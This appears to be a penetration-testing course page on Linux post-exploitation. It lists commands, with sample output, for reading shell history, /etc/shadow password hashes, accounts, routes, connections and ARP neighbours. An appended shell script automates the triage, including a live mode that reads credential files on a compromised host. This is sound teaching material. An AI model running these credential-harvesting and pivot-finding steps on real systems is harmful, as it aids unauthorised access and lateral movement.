12.1: Post Exploitation - Linux

Post Exploitation

  • After we have obtained access to a target, we can start looking for valuable information, which includes, but is not limited to:

  • Accounts & passwords

  • Pivoting opportunities

  • Private networks

  • Banking / highly sensitive information

  • Password hashes

Linux Post Exploitation Command List

Look for the command history (~/.bash_history only covers the current user; also check /root/.bash_history and /home/*/.bash_history where readable)

cat ~/.bash_history

Look for password hashes (/etc/shadow is readable only by root; /etc/passwd is world-readable and lists every account and its login shell)

cat /etc/shadow | head -n 5
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
bin:*:14513:0:99999:7:::
daemon:*:14513:0:99999:7:::
adm:*:14513:0:99999:7:::
lp:*:14513:0:99999:7:::

cat /etc/passwd | head -n 10
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:

Look for pivoting opportunities: the routing table, listening services, established connections and the ARP cache show which networks and neighbours are reachable from this host. Note that in the netstat output below the ESTABLISHED connection from this host to 192.168.56.101:4444 is almost certainly our own session back to the attacking machine, not a target.

locate route
/sbin/route

/sbin/route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.56.0    *               255.255.255.0   U     0      0        0 eth0
127.0.0.0       *               255.0.0.0       U     0      0        0 lo
default         192.168.56.100  0.0.0.0         UG    0      0        0 eth0


locate netstat
netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:32768           0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        1      0 192.168.56.103:139      192.168.56.101:32811    CLOSE_WAIT  keepalive (6990.88/0/0)
tcp        0      0 192.168.56.103:32773    192.168.56.101:4444     ESTABLISHED off (0.00/0/0)
udp        0      0 0.0.0.0:32768           0.0.0.0:*                           off (0.00/0/0)
udp        0      0 127.0.0.1:32769         0.0.0.0:*                           off (0.00/0/0)
udp        0      0 192.168.56.103:137      0.0.0.0:*                           off (0.00/0/0)
udp        0      0 0.0.0.0:137             0.0.0.0:*                           off (0.00/0/0)
udp        0      0 192.168.56.103:138      0.0.0.0:*                           off (0.00/0/0)
udp        0      0 0.0.0.0:138             0.0.0.0:*                           off (0.00/0/0)
udp        0      0 0.0.0.0:820             0.0.0.0:*                           off (0.00/0/0)
udp        0      0 0.0.0.0:111             0.0.0.0:*                           off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node Path
unix  9      [ ]         DGRAM                    899    /dev/log
unix  2      [ ACC ]     STREAM     LISTENING     1233   /dev/gpmctl
unix  2      [ ]         DGRAM                    1276
unix  2      [ ]         DGRAM                    1251
unix  2      [ ]         DGRAM                    1214
unix  2      [ ]         DGRAM                    1148
unix  2      [ ]         DGRAM                    1072
unix  2      [ ]         DGRAM                    962
unix  2      [ ]         DGRAM                    908
unix  2      [ ]         STREAM     CONNECTED     567


locate arp
...
/lib/modules/2.4.7-10/modules.parportmap
/sbin/arp
/sbin/arping
/sbin/arp
...


/sbin/arp
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.100           ether   08:00:27:5E:55:C8   C                     eth0
192.168.56.101           ether   08:00:27:B9:41:99   C                     eth0
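The command list above stops at raw output. As an added example (not part of the original course material), here is a POSIX sh script that runs the same checks and reduces the output to the facts a post-exploitation triage needs: which shadow entries carry a crackable hash, which passwd entries can actually log in, which networks and neighbours are reachable, which services are exposed, and which established connection is our own session. The SAMPLE_* inputs are copied from the example outputs on this page; the function names (hashed_accounts, login_accounts, pivot_routes, listeners, peers, arp_hosts, triage) are this example's own, not from any tool.

```shell
#!/bin/sh
# Added example, not part of the original course material: a POSIX sh triage
# helper that reduces the raw output of the command list above (shadow, passwd,
# route, netstat -ano, arp) to the facts that matter for post-exploitation.
# The SAMPLE_* data below are copied from the page's own example outputs so the
# script runs offline; the function names are ours, not from any tool.

# /etc/shadow entries carrying a real hash (field 2 not empty, not "*" or "!").
# These are the ones worth handing to a cracker; the rest are locked accounts.
hashed_accounts() {
    awk -F: 'length($2) > 1 && $2 !~ /^[*!]/ { print $1 }'
}

# /etc/passwd entries that can log in interactively.  An EMPTY shell field is
# not "no shell": login(1) substitutes /bin/sh, so such accounts are usable.
login_accounts() {
    awk -F: '{ shell = ($7 == "") ? "/bin/sh" : $7 }
             shell !~ /(nologin|false|sync|shutdown|halt)$/ { print $1 ":" shell }'
}

# Networks reachable from this host, from "route" or "route -n" output.
# Everything except the loopback net is a candidate pivot target.
pivot_routes() {
    awk '$1 == "Kernel" || $1 == "Destination" || $1 == "127.0.0.0" { next }
         $1 == "default" || $1 == "0.0.0.0" { print "default via " $2 " dev " $8; next }
         { print $1 "/" $3 " dev " $8 }'
}

# Services bound to something other than loopback, from "netstat -ano" output.
listeners() {
    awk '(($1 == "tcp" && $6 == "LISTEN") || $1 == "udp") && $4 !~ /^127\./ { print $1 " " $4 }'
}

# Remote ends of live TCP connections.  Pass our own attacking host as $1 so the
# connection carrying this shell is tagged instead of being treated as a target.
peers() {
    awk -v me="${1:-}" '$1 == "tcp" && $6 ~ /^(ESTABLISHED|CLOSE_WAIT)$/ {
        split($5, a, ":")
        print $5 ((me != "" && a[1] == me) ? " (our own host)" : "")
    }'
}

# IP/MAC pairs from the ARP cache: hosts that have exchanged traffic with us.
arp_hosts() {
    awk '$2 == "ether" { print $1 " " $3 }'
}

# Sample inputs, copied from the example outputs shown on the page.
SAMPLE_SHADOW='root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
bin:*:14513:0:99999:7:::
daemon:*:14513:0:99999:7:::'
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
news:x:9:13:news:/var/spool/news:'
SAMPLE_ROUTE='Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.56.0    *               255.255.255.0   U     0      0        0 eth0
127.0.0.0       *               255.0.0.0       U     0      0        0 lo
default         192.168.56.100  0.0.0.0         UG    0      0        0 eth0'
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      off (0.00/0/0)
tcp        1      0 192.168.56.103:139      192.168.56.101:32811    CLOSE_WAIT  keepalive (6990.88/0/0)
tcp        0      0 192.168.56.103:32773    192.168.56.101:4444     ESTABLISHED off (0.00/0/0)
udp        0      0 127.0.0.1:32769         0.0.0.0:*                           off (0.00/0/0)
udp        0      0 0.0.0.0:137             0.0.0.0:*                           off (0.00/0/0)'
SAMPLE_ARP='Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.56.100           ether   08:00:27:5E:55:C8   C                     eth0
192.168.56.101           ether   08:00:27:B9:41:99   C                     eth0'

# "triage" runs on the sample data; "triage live ATTACKER_IP" runs the real
# commands on this host (shadow needs root; route/netstat/arp need net-tools).
triage() {
    case "${1:-sample}" in
    sample)
        echo "[hashes]"; printf '%s\n' "$SAMPLE_SHADOW"  | hashed_accounts
        echo "[logins]"; printf '%s\n' "$SAMPLE_PASSWD"  | login_accounts
        echo "[routes]"; printf '%s\n' "$SAMPLE_ROUTE"   | pivot_routes
        echo "[listen]"; printf '%s\n' "$SAMPLE_NETSTAT" | listeners
        echo "[peers]";  printf '%s\n' "$SAMPLE_NETSTAT" | peers 192.168.56.101
        echo "[arp]";    printf '%s\n' "$SAMPLE_ARP"     | arp_hosts ;;
    live)
        echo "[history]"; cat "$HOME/.bash_history" /root/.bash_history /home/*/.bash_history 2>/dev/null || true
        echo "[hashes]";  if [ -r /etc/shadow ]; then hashed_accounts < /etc/shadow; else echo "shadow not readable"; fi
        echo "[logins]";  login_accounts < /etc/passwd
        echo "[routes]";  route -n | pivot_routes
        echo "[listen]";  netstat -ano | listeners
        echo "[peers]";   netstat -ano | peers "${2:-}"
        echo "[arp]";     arp -n | arp_hosts ;;
    esac
}

triage "$@"
```

Two points the parsers encode that are easy to miss when eyeballing the raw output: the `news` account in the page's passwd listing has an empty shell field, which login(1) treats as /bin/sh rather than as "no shell", so it is a usable account; and the only ESTABLISHED connection is to the attacking host, so tagging it keeps it out of the target list. The parsers are written for the net-tools output format shown on the page; on current distributions `route`, `netstat` and `arp` are usually absent and the equivalents are `ip route`, `ss -tulpan` and `ip neigh`, whose column layouts differ.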